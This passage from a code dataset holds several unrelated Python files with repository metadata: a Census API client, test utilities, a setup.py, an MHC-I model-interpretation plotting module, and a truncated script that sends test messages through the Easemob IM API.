] | null | null | null | #####################################
##### Class to Query Census API #####
#####################################
import requests
import json
import pandas as pd
import datascience as ds
from .utils import *
class CensusQuery:
"""Object to query US Census API"""
_url_endings = {
"acs5": "acs/acs5",
"acs1": "acs/acs1",
"sf1": "dec/sf1"
}
_variable_aliases = {
"acs5": {
"total_population": "B00001_001E",
}
}
def __init__(self, api_key, dataset, year=None, out="pd"):
"""
Initializes the CensusQuery object to start API requests
Args:
* api_key (`str`): User's API key
* dataset (`str`): The dataset to be queried; `"acs5"`, `"acs1"`, or `"sf1"`
Kwargs:
* year (`int`): The year to query data for; can be overwritten in `CensusQuery.query`
* out (`str`): Whether output should be `pandas.DataFrame` or `datascience.tables.Table`; `"pd"` or `"ds"`
Returns:
* `CensusQuery`. The `CensusQuery` instance to be used to query the API
"""
assert dataset in CensusQuery._url_endings.keys(), "{} is not a valid dataset".format(dataset)
self._dataset = CensusQuery._url_endings[dataset]
if year:
assert type(year) == int, "{} not a valid year".format(year)
self._year = year
self._api_key = api_key
assert out in ["pd", "ds"], """out argument must be \"pd\" or \"ds\""""
self._out = out
def _make_params(self, variables, state, county, tract, year):
"""
Creates parameters dict for requests
Args:
* `variables` (`list`): List of variables to extract
* `state` (`str`): Abbreviation for state from which to query data
* `county` (`str`): County name for localized queries
* `tract` (`str`): FIPS code for tract to query data from
* `year` (`int`): Year for which to query data
Returns:
* `dict`. A dict of parameters for the API query
"""
assert type(variables) == list, "variables must be a list"
assert len(state) == 2, "state must be an abbreviation"
params = {}
params["get"] = ",".join(variables)
params["for"] = "tract:{}".format(tract)
state_fips = zero_pad_state(state)
params["in"] = "state:{}".format(state_fips)
if county:
county_fips = get_county_fips(county, state)
params["in"] += "+county:{}".format(county_fips)
params["key"] = self._api_key
return params
def _send_request(self, variables, state, county, tract, year):
"""
Sends request to API through `requests` package
Args:
* `variables` (`list`): List of variables to extract
* `state` (`str`): Abbreviation for state from which to query data
* `county` (`str`): County name for localized queries
* `tract` (`str`): FIPS code for tract to query data from
* `year` (`int`): Year for which to query data
Returns:
* `pandas.DataFrame`. The data retrieved from the query
"""
params = self._make_params(variables, state, county, tract, year)
url = "https://api.census.gov/data/{}/{}".format(year, self._dataset)
response = requests.get(url, params)
try:
text = json.loads(response.text)
except json.JSONDecodeError:
return response.text
cols = text[0]
response_df = pd.DataFrame(text[1:], columns=cols)
return response_df
def query(self, variables, state, county=None, tract="*", year=None):
"""
Queries Census API to get data regarding listed variables; if `year` provided, ignores `CensusData` instance year
Args:
* `variables` (`list`): List of variables to extract
* `state` (`str`): Abbreviation for state from which to query data
* `county` (`str`): County name for localized queries
* `tract` (`str`): FIPS code for tract to query data from
* `year` (`int`): Year for which to query data; if provided, ignores instance `year`
Returns:
* `pandas.DataFrame` or `datascience.tables.Table`. The data retrieved from the query
"""
if not self._year:
assert year != None, "Year must be defined"
assert type(year) == int, "{} not a valid year".format(year)
response_df = self._send_request(variables, state, county, tract, year)
if response_df == "":
return response_df
if self._out == "ds":
return ds.Table.from_df(response_df)
return response_df | 29.719424 | 115 | 0.657952 | 3,921 | 0.949165 | 0 | 0 | 0 | 0 | 0 | 0 | 2,426 | 0.587267 |
33f9bc9ef4a0562402b71b8f52d5b6955d65ca99 | 264 | py | Python | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | null | null | null | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | 5 | 2022-03-17T15:00:23.000Z | 2022-03-26T08:33:19.000Z | tests/utils.py | mihhail-m/avaandmed-py | c64b07db989b9aff4cfa7f4e18efc0c47ae5e219 | [
"MIT"
] | null | null | null | import json
from pathlib import Path
def load_json(path: Path):
data = None
with open(path.absolute(), encoding='utf-8') as f:
data = json.load(f)
return data
def format_mock_url(url: str, mock_value: str):
return f'{url}/{mock_value}'
| 18.857143 | 54 | 0.659091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 28 | 0.106061 |
33faf3e59ae2a6c2f4688c40e56760f5e45ff478 | 999 | py | Python | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 5 | 2021-06-25T14:34:52.000Z | 2021-07-04T14:15:13.000Z | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 1 | 2021-12-12T00:47:25.000Z | 2022-01-24T17:19:43.000Z | setup.py | ammarsys/pyanywhere-wrapper | d8cde2d29900c25fc7ab3cd8103923f727b5dade | [
"MIT"
] | 1 | 2021-12-14T15:44:52.000Z | 2021-12-14T15:44:52.000Z | import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="pyaww",
version="0.0.3",
author="ammarsys",
author_email="amarftw1@gmail.com",
description="A simple API wrapper around the pythonanywhere's API.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/ammarsys/pyaww/",
project_urls={
"Bug Tracker": "https://github.com/ammarsys/pyaww/issues",
},
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
"Operating System :: OS Independent",
],
packages=['pyaww'],
install_requires=[
'typing_extensions==3.10.0.0', 'requests==2.25.1'
],
python_requires=">=3.6",
license='MIT'
) | 31.21875 | 72 | 0.627628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 519 | 0.51952 |
33fd5340f85ed0ca31c259e1144a71ef4b91e995 | 24,831 | py | Python | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | 4 | 2021-04-29T02:57:15.000Z | 2022-01-10T10:31:52.000Z | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | null | null | null | development/CAMInterp.py | kohanlee1995/MHCfovea | 040975e43926a5f8e344b642af6e900b74b50d02 | [
"MIT"
] | 1 | 2021-04-21T07:38:55.000Z | 2021-04-21T07:38:55.000Z | import os, sys, re, json, random, importlib
import numpy as np
import pandas as pd
from collections import OrderedDict
from tqdm import tqdm
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import logomaker as lm
from venn import venn
from venn import generate_petal_labels, draw_venn
from scipy.stats import pearsonr
from scipy.cluster import hierarchy
from util import *
import warnings
warnings.filterwarnings('ignore')
class CAMInterp():
def __init__(self, mhc_seq_filename, allele_mask_dirname, epitope_mask_dirname, df_filename, output_dir,
pred_basename='score', pred_threshold=0.9, mhc_len=182, min_sample_num=100, submotif_len=4):
self.aa_str = 'ACDEFGHIKLMNPQRSTVWY'
self.mhc_len = mhc_len
self.epitope_len = 10
self.res34_pos = [6, 8, 23, 44, 58, 61, 62, 65, 66, 68, 69, 72, 73, 75, 76, 79, 80, 83, 94,
96, 98, 113, 115, 117, 142, 146, 149, 151, 155, 157, 158, 162, 166, 170]
self.color_dict = {'A': '#DACC47', 'B': '#B1DEC9', 'C': '#FFBB99', 'polymorphism': '#875A85'}
self.dpi = 600
self.fontsize = 10
self.pred_basename = pred_basename
self.pred_threshold = pred_threshold
self.min_sample_num = min_sample_num
self.submotif_len = submotif_len
self.output_dir = output_dir
# mhc_seq_dict
self.mhc_seq_dict = json.load(open(mhc_seq_filename, 'r'))
# allele_mask_df
if type(allele_mask_dirname) == list:
alleles = [self._convert_allele(i) for i in os.listdir(allele_mask_dirname[0])]
self.allele_mask_df = pd.DataFrame(columns=alleles, index=range(self.mhc_len), data=0)
self.allele_mask_df.loc['count'] = 0
for i in range(len(allele_mask_dirname)):
temp_df = pd.DataFrame(self._parse_mask(allele_mask_dirname[i], mask_type='mhc'))
self.allele_mask_df.loc[temp_df.index, temp_df.columns] += temp_df
self.allele_mask_df.loc['count', temp_df.columns] += 1
self.allele_mask_df = self.allele_mask_df.loc[:, self.allele_mask_df.loc['count'] != 0]
self.allele_mask_df.loc[range(self.mhc_len)] /= self.allele_mask_df.loc['count']
self.allele_mask_df = self.allele_mask_df.drop('count')
else:
self.allele_mask_df = pd.DataFrame(self._parse_mask(allele_mask_dirname, mask_type='mhc'))
self.allele_mask_df.to_csv('%s/AlleleMask.csv'%self.output_dir)
# epitope_mask_df
if type(epitope_mask_dirname) == list:
alleles = [self._convert_allele(i) for i in os.listdir(epitope_mask_dirname[0])]
self.epitope_mask_df = pd.DataFrame(columns=alleles, index=range(self.epitope_len), data=0)
self.epitope_mask_df.loc['count'] = 0
for i in range(len(epitope_mask_dirname)):
temp_df = pd.DataFrame(self._parse_mask(epitope_mask_dirname[i], mask_type='epitope'))
self.epitope_mask_df.loc[temp_df.index, temp_df.columns] += temp_df
self.epitope_mask_df.loc['count', temp_df.columns] += 1
self.epitope_mask_df = self.epitope_mask_df.loc[:, self.epitope_mask_df.loc['count'] != 0]
self.epitope_mask_df.loc[range(self.epitope_len)] /= self.epitope_mask_df.loc['count']
self.epitope_mask_df = self.epitope_mask_df.drop('count')
else:
self.epitope_mask_df = pd.DataFrame(self._parse_mask(epitope_mask_dirname, mask_type='epitope'))
self.epitope_mask_df['position'] = [1,2,3,4,5,-5,-4,-3,-2,-1]
self.epitope_mask_df = self.epitope_mask_df.set_index('position', drop=True)
self.epitope_mask_df.to_csv('%s/EpitopeMask.csv'%self.output_dir)
# df
self.df = pd.read_csv(df_filename, index_col=0)
self.alleles = list(self.df['mhc'].unique())
self.allele_num = len(self.alleles)
# motif_dict
self.motif_dict = self._parse_motif(pred_basename, pred_threshold, self.min_sample_num)
self.alleles = list(self.df['mhc'].unique())
self.allele_num = len(self.alleles)
# mhc_seqlogo_df
self.mhc_seqlogo_df = self._mhc_seqlogo_df(self.alleles, list(range(self.mhc_len)))
def ResidueAnalysis(self, cam_threshold, importance_threshold, barplot_figsize=(10,2), square_figsize=(3.5,3.5)):
# mean plot
self._residue_barplot(self.allele_mask_df.mean(axis=1), self.res34_pos, figsize=barplot_figsize,
figfile='%s/CAMmean.png'%self.output_dir)
# importance plot
importance_count = self._residue_importance_count(self.alleles, cam_threshold)
self._residue_barplot(importance_count, self.res34_pos, figsize=barplot_figsize,
figfile='%s/CAMimportance.png'%self.output_dir)
# important residues - stacked plot
df = self._importance_stacked_barplot(cam_threshold, self.res34_pos,
xticklabels=False, yticklabels=True, figsize=barplot_figsize,
figfile='%s/CAMimportanceStacked.png'%self.output_dir)
df.to_csv('%s/ImportanceStack.csv'%self.output_dir)
# important residues
residue_dict = self._select_residue(cam_threshold, importance_threshold)
json.dump(residue_dict, open('%s/ResidueSelection.json'%self.output_dir, 'w'))
# venn diagram of residue selection
self._importance_venn_plot(residue_dict, figsize=square_figsize,
figfile='%s/ResidueSelectionVenn.png'%self.output_dir)
# correlation between residue importance and sequence entropy
# entropy = sigma(probability**2)
# allele part
df = self._mhc_importance_polymorphism_plot(cam_threshold, residue_dict, figsize=square_figsize,
figfile='%s/AlleleImportanceEntropyCorrelation.png'%self.output_dir)
df.to_csv('%s/AlleleImportancePolymorphism.csv'%self.output_dir)
# epitope part
df = self._epitope_importance_polymorphism_plot(figsize=square_figsize,
figfile='%s/EpitopeImportanceEntropyCorrelation.png'%self.output_dir)
df.to_csv('%s/EpitopeImportancePolymorphism.csv'%self.output_dir)
def ClusterAnalysis(self, method, metric, allele_figsize=(10,2), epitope_figsize=(3.5,3.5)):
alleles = self.alleles
# allele masks
allele_order, position_order = self._mask_clustering_plot(alleles, mask_type='mhc',
method=method, metric=metric,
xticklabels=False, yticklabels=False,
row_colors=True, figsize=allele_figsize,
title=None, xlabel='MHC-I position', ylabel='MHC-I allele',
figfile='%s/AlleleCAMcluster_all.png'%self.output_dir)
# epitope masks
allele_order, position_order = self._mask_clustering_plot(alleles, mask_type='epitope',
method=method, metric=metric,
xticklabels=True, yticklabels=False,
row_colors=True, figsize=epitope_figsize,
title=None, xlabel='peptide position', ylabel='MHC-I allele',
figfile='%s/EpitopeCAMcluster_all.png'%self.output_dir)
""""""""""""""""""""""""""""""""""""""
# Plots
""""""""""""""""""""""""""""""""""""""
# mask_type: mhc or epitope
def _mask_clustering_plot(self, alleles, mask_type='mhc',
method='average', metric='euclidean',
allele_linkage=True, position_linkage=False,
row_colors=False, xticklabels=True, yticklabels=True,
title=None, xlabel=None, ylabel=None,
figsize=(8, 4), figfile=None):
# residue positions
if mask_type == 'mhc':
positions = list(range(self.mhc_len))
df = self.allele_mask_df.iloc[positions][alleles].T
else:
positions = [1,2,3,4,-4,-3,-2,-1]
df = self.epitope_mask_df.loc[positions][alleles].T
# linkage
zx, zy = None, None
if allele_linkage:
zy = hierarchy.linkage(df, method=method, metric=metric, optimal_ordering=True)
if position_linkage:
zx = hierarchy.linkage(df.T, method=method, metric=metric, optimal_ordering=True)
# row colors
if row_colors:
color_list = list()
for allele in alleles:
hla = allele.split('*')[0]
color_list.append(self.color_dict[hla])
else:
color_list = None
# clustermap
g = sns.clustermap(df,
col_cluster=position_linkage,
row_cluster=allele_linkage,
row_linkage=zy,
col_linkage=zx,
row_colors = color_list,
cmap='Blues',
cbar_kws={'orientation': 'horizontal', 'label': 'mask score'},
cbar_pos=(.3, -.05, .4, .02),
dendrogram_ratio=0.1,
colors_ratio=0.02,
xticklabels=xticklabels,
yticklabels=yticklabels,
figsize=figsize)
g.ax_heatmap.set_title(title)
g.ax_heatmap.set_xlabel(xlabel)
g.ax_heatmap.set_ylabel(ylabel)
# cluster order
if allele_linkage:
allele_order = g.dendrogram_row.reordered_ind
allele_order = [alleles[i] for i in allele_order]
else:
allele_order = None
if position_linkage:
position_order = g.dendrogram_col.reordered_ind
position_order = [positions[i] for i in position_order]
else:
position_order = None
# save figure
if figfile:
plt.savefig(figfile, bbox_inches='tight', dpi=self.dpi)
return allele_order, position_order
def _motif_plot(self, alleles, motif_dict, figfile=None):
allele_num = len(alleles)
fig, ax = plt.subplots(allele_num, figsize=(0.8, allele_num*0.2), dpi=self.dpi)
for i in range(allele_num):
allele = alleles[i]
seqlogo_df = pd.DataFrame(motif_dict[allele], columns=list(self.aa_str))
logo = lm.Logo(seqlogo_df, ax=ax[i], color_scheme="skylign_protein")
_ = ax[i].set_xticks([])
_ = ax[i].set_yticks([])
for side in ['top','bottom','left','right']:
ax[i].spines[side].set_linewidth(0.1)
fig.tight_layout()
if figfile:
fig.savefig(figfile)
def _residue_barplot(self, arr, tag_pos, figsize=(8,3), figfile=None):
# main figure
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
sns.barplot(x=list(range(self.mhc_len)), y=arr, ax=ax)
ax.tick_params(axis='x', rotation=90)
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
for item in ax.get_xticklabels():
item.set_fontsize(self.fontsize/4)
# set xtick colors
colors = list()
for i in range(self.mhc_len):
if i in tag_pos:
colors.append('red')
else:
colors.append('black')
for tick, color in zip(ax.get_xticklabels(), colors):
tick.set_color(color)
fig.tight_layout()
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
def _importance_stacked_barplot(self, cam_threshold, tag_pos, figsize=(8,3),
xticklabels=True, yticklabels=True, figfile=None):
# build importance dataframe, columns=['A','B','C']
d = dict()
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
d[hla] = self._residue_importance_count(alleles, cam_threshold)
df = pd.DataFrame(d)
# figure
fig = plt.figure(figsize=figsize, dpi=self.dpi)
ax = fig.add_subplot(111)
ax.margins(x=0)
# stacked bar plot
ax.bar(df.index, df['A'], color=self.color_dict['A'])
ax.bar(df.index, df['B'], bottom=df['A'], color=self.color_dict['B'])
ax.bar(df.index, df['C'], bottom=df['A'] + df['B'], color=self.color_dict['C'])
# ticks & ticklabels
if xticklabels:
_ = ax.set_xticks(df.index)
_ = ax.set_xticklabels(df.index+1, rotation=90)
# xtick colors
colors = list()
for i in df.index:
if i in tag_pos:
colors.append('red')
else:
colors.append('black')
for tick, color in zip(ax.get_xticklabels(), colors):
tick.set_color(color)
else:
_ = ax.set_xticks([])
_ = ax.set_xticklabels([])
if yticklabels:
_ = ax.set_ylabel('importance')
else:
_ = ax.set_yticks([])
_ = ax.set_yticklabels([])
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
# legend
Abar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['A'], edgecolor='none')
Bbar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['B'], edgecolor='none')
Cbar = matplotlib.patches.Rectangle((0,0),1,1,fc=self.color_dict['C'], edgecolor='none')
l = ax.legend([Abar, Bbar, Cbar], ['HLA-A', 'HLA-B', 'HLA-C'], loc=0, ncol=3, fontsize=self.fontsize)
l.draw_frame(False)
fig.tight_layout()
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _mhc_importance_polymorphism_plot(self, cam_threshold, position_dict, figsize=(3.5,3.5), s=2, figfile=None):
# figure
df = pd.DataFrame()
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
# calculate entropy
df['polymorphism'] = -(self.mhc_seqlogo_df*np.log(self.mhc_seqlogo_df)).sum(axis=1)
# calculate importance by HLA
importance_counts = list()
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
importance_counts.append(self._residue_importance_count(alleles, cam_threshold))
importance_counts = np.array(importance_counts)
importance_count = importance_counts.max(axis=0)
df['importance'] = importance_count
# label
df['label'] = 'others'
df.loc[position_dict['res34'], 'label'] = '34-residue'
df.loc[position_dict['selected'], 'label'] = 'selected'
intersect = list(set(position_dict['res34']) & set(position_dict['selected']))
df.loc[intersect, 'label'] = 'intersection'
# plot_param
param_dict = OrderedDict({'selected':{'color': '#ff4949', 'marker': 'o', 's': 12},
'intersection': {'color': '#ff4949', 'marker': 'x', 's': 12},
'34-residue': {'color': '#adb5bd', 'marker': 'x', 's': 12},
'others': {'color': '#adb5bd', 'marker': 'o', 's': 12}})
# regplot
df = df[df['polymorphism']!=0]
p = sns.regplot(x='importance', y='polymorphism', data=df, ax=ax, fit_reg=True, scatter_kws={'s':0})
for label, params in param_dict.items():
p = sns.regplot(x='importance', y='polymorphism', data=df[df['label']==label],
ax=ax, fit_reg=False, marker=params['marker'],
scatter_kws={'color':params['color'], 's':params['s'], 'linewidths': 0.1})
'''
# annotation
for idx, row in df.iterrows():
if idx in [64, 70]:
p.text(df.loc[idx, 'importance']-0.025, df.loc[idx, 'polymorphism']-0.09, idx+1, fontsize=self.fontsize-2)
'''
# fontsize
for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] + ax.get_xticklabels() + ax.get_yticklabels()):
item.set_fontsize(self.fontsize)
# legend
legend_list = [matplotlib.patches.Rectangle((0,0),1,1,fc='#ff4949', edgecolor='none'),
matplotlib.patches.Rectangle((0,0),1,1,fc='#adb5bd', edgecolor='none'),
plt.scatter([], [], color='black', marker='x', s=12),
plt.scatter([], [], color='black', marker='o', s=12)]
label_list = ['selected', 'non-selected', '34-residue', 'non-34-residue']
l = ax.legend(handles=legend_list, labels=label_list,
loc='lower left', bbox_to_anchor=(-0.2,1), ncol=2, fontsize=self.fontsize)
l.draw_frame(True)
# layout
ax.set_xticks([0.0, 0.2, 0.4, 0.6, 0.8, 1.0, 1.02])
ax.set_xticklabels([0.0, 0.2, 0.4, 0.6, 0.8, 1.0, ''])
fig.tight_layout()
# pearson correlation
pearson, pvalue = pearsonr(df['importance'], df['polymorphism'])
ax.text(0.05, 1.6, 'r=%.2f, p=%.2e'%(pearson, pvalue))
# save figure
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _epitope_importance_polymorphism_plot(self, figsize=(3.5,3.5), figfile=None):
# get epitope polymorphism
peptides = self.df[self.df[self.pred_basename] > self.pred_threshold]['sequence'].to_list()
peptides = [i[:self.submotif_len] + i[-self.submotif_len:] for i in peptides]
seqlogo_df = lm.alignment_to_matrix(sequences=peptides, to_type="probability",
characters_to_ignore=".", pseudocount=0)
polymorphism = -(seqlogo_df*np.log(seqlogo_df)).sum(axis=1).to_numpy()
# df for plot
df = pd.DataFrame(index=list(range(1, 1+self.submotif_len)) + list(range(-self.submotif_len, 0)))
df['polymorphism'] = polymorphism
df['mask_score'] = self.epitope_mask_df.mean(axis=1)[df.index]
df['residue_tag'] = 'other'
df.loc[[2,-1], 'residue_tag'] = 'anchor'
# plot
fig, ax = plt.subplots(1, 1, figsize=figsize, dpi=self.dpi)
sns.scatterplot(data=df, x='mask_score', y='polymorphism', hue='residue_tag', ax=ax)
for pos in [2, -1]:
ax.text(x=df.loc[pos, 'mask_score']-0.25, y=df.loc[pos, 'polymorphism'], s='Position: {}'.format(pos))
fig.tight_layout()
if figfile:
fig.savefig(figfile, bbox_inches='tight')
return df
def _importance_venn_plot(self, position_dict, figsize=(3.5,3.5), figfile=None):
keys = ['A','B','C','polymorphism']
position_dict = {k: set(v) for k, v in position_dict.items() if k in keys}
petal_labels = generate_petal_labels(position_dict.values())
colors = [list(np.array(self._convert_color_code(self.color_dict[k]))/256) + [0.4] for k in keys]
fig, ax = plt.subplots(1, figsize=figsize, dpi=self.dpi)
draw_venn(petal_labels=petal_labels, dataset_labels=position_dict.keys(),hint_hidden=False,
colors=colors, figsize=figsize, fontsize=self.fontsize, legend_loc="best", ax=ax)
ax.get_legend().remove()
legends = [matplotlib.patches.Rectangle((0,0),1,1,fc=color, edgecolor='none') for color in colors]
l = fig.legend(legends, keys, fontsize=self.fontsize,
ncol=4, loc="lower center", bbox_to_anchor=(0, 0.75, 1, 0.2),
columnspacing=1, handlelength=0.5, handletextpad=0.2, borderpad=0.2)
fig.tight_layout()
if figfile:
fig.savefig(figfile, bbox_inches='tight')
""""""""""""""""""""""""""""""""""""""
# Minor Functions
""""""""""""""""""""""""""""""""""""""
def _parse_mask(self, dirname, mask_type):
masks = OrderedDict()
for allele in os.listdir(dirname):
if re.match(r'[ABC][0-9]+', allele):
if not os.path.isfile('%s/%s/record.npy'%(dirname, allele)):
continue
if mask_type == 'mhc':
masks[self._convert_allele(allele)] \
= np.load('%s/%s/record.npy'%(dirname, allele), allow_pickle=True)[()]['mhc_masks'].mean(axis=0)
else:
masks[self._convert_allele(allele)] \
= np.load('%s/%s/record.npy'%(dirname, allele), allow_pickle=True)[()]['epitope_masks'].mean(axis=0)
return masks
def _parse_motif(self, basename, threshold, sample_num):
motifs = OrderedDict()
for i in range(self.allele_num):
allele = self.alleles[i]
seqs = self.df.loc[(self.df['mhc']==allele) & (self.df[basename] >= threshold), 'sequence']
if len(seqs) >= sample_num:
seqs = seqs.apply(lambda x: x[:self.submotif_len] + x[-self.submotif_len:])
temp_df = pd.DataFrame(columns=list(self.aa_str))
seqlogo_df = lm.alignment_to_matrix(sequences=seqs, to_type="information", characters_to_ignore="XU")
temp_df = pd.concat([temp_df, seqlogo_df], axis=0)
temp_df = temp_df.fillna(0.0)
motifs[allele] = temp_df.to_numpy()
return motifs
def _residue_importance_count(self, alleles, cam_threshold):
importance_count = np.array([0]*self.mhc_len)
for allele in alleles:
importance_count[self.allele_mask_df[allele] > cam_threshold] += 1
return importance_count / len(alleles)
def _mhc_seqlogo_df(self, alleles, positions):
seqs = list()
for allele in alleles:
seqs.append(''.join(self.mhc_seq_dict[allele][j] for j in positions))
temp_df = pd.DataFrame(columns=list(self.aa_str))
seqlogo_df = lm.alignment_to_matrix(sequences=seqs, to_type="probability",
characters_to_ignore=".", pseudocount=0)
temp_df = pd.concat([temp_df, seqlogo_df], axis=0)
temp_df = temp_df.fillna(0.0)
return temp_df
def _select_residue(self, cam_threshold, importance_threshold):
importance_positions = dict()
importance_position_set = set()
importance_positions['res34'] = self.res34_pos
# by HLA
for hla in ['A', 'B', 'C']:
alleles = [i for i in self.alleles if hla in i]
importance_count = self._residue_importance_count(alleles, cam_threshold)
pos = list(map(int, np.where(importance_count > importance_threshold)[0]))
importance_positions[hla] = pos
importance_position_set = importance_position_set | set(pos)
# polymorphism
polymorphism_position = list(map(int,self.mhc_seqlogo_df[~(self.mhc_seqlogo_df.max(axis=1)==1)].index))
importance_positions['polymorphism'] = sorted(polymorphism_position)
importance_position_set = importance_position_set & set(polymorphism_position)
# final
importance_position = sorted(list(importance_position_set))
importance_positions['selected'] = importance_position
return importance_positions
def _convert_allele(self, allele):
if re.match(r'[ABC][0-9]+', allele):
return allele[0] + '*' + allele[1:-2] + ':' + allele[-2:]
elif re.match(r'[ABC]\*[0-9]+\:[0-9]+', allele):
return allele
def _convert_color_code(self, code):
return tuple(int(code[i:i+2], 16) for i in (1, 3, 5))
| 45.813653 | 127 | 0.568966 | 24,382 | 0.981918 | 0 | 0 | 0 | 0 | 0 | 0 | 3,311 | 0.133341 |
33feaaef9c20723000c009c977b27fc9c05c9b4d | 4,478 | py | Python | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | 1 | 2021-06-09T02:06:17.000Z | 2021-06-09T02:06:17.000Z | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | null | null | null | projects/imsend/imsend.py | ZJM6658/PythonProject | 8ca51a1551b20ccd696358941727188838e0e236 | [
"MIT"
] | null | null | null | #!usr/bin/python
# -*- coding: utf-8 -*-
' an im_send project '
# __author__ 'ZHU JIAMIN'
import sys
import mysql.connector #python3不支持
import requests
import json
from os import path, access, R_OK # W_OK for write permission.
#python2默认编码ascii 使用此方法改为utf8
reload(sys)
sys.setdefaultencoding('utf8')
# 流程
# 1.检查传入的参数是否符合程序需求(必填mobile,其他都有默认值)
# 2.检查同级目录下是否有accessToken文件,有的话读取其中的token,没有的话去环信服务器获取后写入到该文件
# 3.拿到accessToken之后,根据传入的参数(mobile, limit, offset),查询数据库,获取发送方集合、接收方的用户信息
# 4.循环发送消息
#请求头
BASE_URL = 'https://a1.easemob.com/xxxx/xxxxxx'
#用来获取和保存环信ACCESS_TOKEN
CLIENT_ID = 'xxxxxx'
CLIENT_SECRET = 'xxxxxxx'
ACCESS_TOKEN ='' #从文件读取
TOKEN_PATH = './accessToken.txt'
#用来存放传入的参数
INPUT_PARAMS = {'offset':0, 'limit':1, 'isGroup':0, 'text': '测试消息'}
# TODO
# 支持往一个人所加的所有群里面发送消息
# 支持一个群里面所有人往同时群里发消息
def main():
args = sys.argv
if len(args) == 1:
print('请输入必要参数:\
\n-mobile 接收方手机号(必填)\
\n-text 发送内容(默认为:测试消息)\
\n-offset 起始游标(默认为0)\
\n-limit 发送数量(默认为1)')
# \n-isGroup 是否群聊(默认为0,需要则填1)'
return
global INPUT_PARAMS
argsLen = len(args)
for i in range(argsLen):
arg = args[i]
#过滤掉第一个参数(自己本身)
if i == 0: continue
if i%2 == 1:
#去掉key参数中的'-'
arg = arg.replace('-', '')
if i < argsLen - 1:
INPUT_PARAMS[arg] = args[i+1]
pass
#检查必要参数mobile是否正确传入
if not('mobile' in INPUT_PARAMS) or len(INPUT_PARAMS['mobile']) == 0:
print('请传入必要参数-mobile')
return
# print INPUT_PARAMS
limit = int(INPUT_PARAMS['limit'])
offset = int(INPUT_PARAMS['offset'])
if limit < 0 or offset < 0 or limit > 2000 or offset > 2000 or (offset + limit) > 2000:
print('limit 和 offset参数必须>=0, <2000, 且limit + offset < 2000')
return
checkAccessToken()
pass
#检查access_token 不存在便获取
def checkAccessToken():
global ACCESS_TOKEN
if path.exists(TOKEN_PATH) and path.isfile(TOKEN_PATH) and access(TOKEN_PATH, R_OK):
# print("token文件存在且可读")
f = open(TOKEN_PATH, 'r')
ACCESS_TOKEN = f.read()
f.close()
if not(ACCESS_TOKEN):
getIMAccessToken()
else:
# print("token文件不存在或不可读")
getIMAccessToken()
prepareSend()
pass
#准备发送 获取发送消息所需要的数据
def prepareSend():
userSQL = 'select * from y_user where mobile_phone=%s && isdel=0' %(INPUT_PARAMS['mobile'], )
result = getDataFromDataBase(userSQL)
if len(result) == 0 :
print "未查询到手机号码为%s的用户,请检查手机号是否正确" %(INPUT_PARAMS['mobile'])
return
accepterInfo = result[0]
sendersSQL = 'select * from y_user where mobile_phone like "1300000%%" && isdel=0 limit %s offset %s' %(INPUT_PARAMS['limit'], INPUT_PARAMS['offset'])
result = getDataFromDataBase(sendersSQL)
if len(result) == 0:
print '没有找到发送者列表'
return
#imid字段在第14个 这里因为没有使用ORM,返回的是一个元组(tuple)
toImId = accepterInfo[14]
for user in result:
sendMessage(user, toImId)
pass
pass
#发送消息
def sendMessage(fromUser, toImId):
fromImId = fromUser[14]
if len(ACCESS_TOKEN) == 0: return
sendBody = {
"target_type": "users",
"target": [
toImId
],
"msg": {
"type": "txt",
"msg": INPUT_PARAMS['text']
},
"from": fromImId,
"ext": {
"attr1": "v1"
}
}
url = BASE_URL + '/messages'
headers = {
'Content-Type': 'application/json;charset=utf-8',
'Authorization': ACCESS_TOKEN
}
r = requests.post(url, headers = headers, data = json.dumps(sendBody))
# print fromUser
logInfo = '用户名:%s,手机号:%s,' %(fromUser[7], fromUser[8])
if r.status_code == 200:
print logInfo + '发送成功'
else:
print logInfo + '发送失败'
#传入查询语句 查询数据库
def getDataFromDataBase(execute):
conn = mysql.connector.connect(host = 'mysql.xxxx.net',user = 'root',
password = 'xxxx',database = 'xxxx',port = 3306,
charset = 'utf8')
cursor = conn.cursor()
cursor.execute(execute)
result = cursor.fetchall()
cursor.close()
conn.close()
return result
#获取环信access_token 用于后续操作
def getIMAccessToken():
global ACCESS_TOKEN
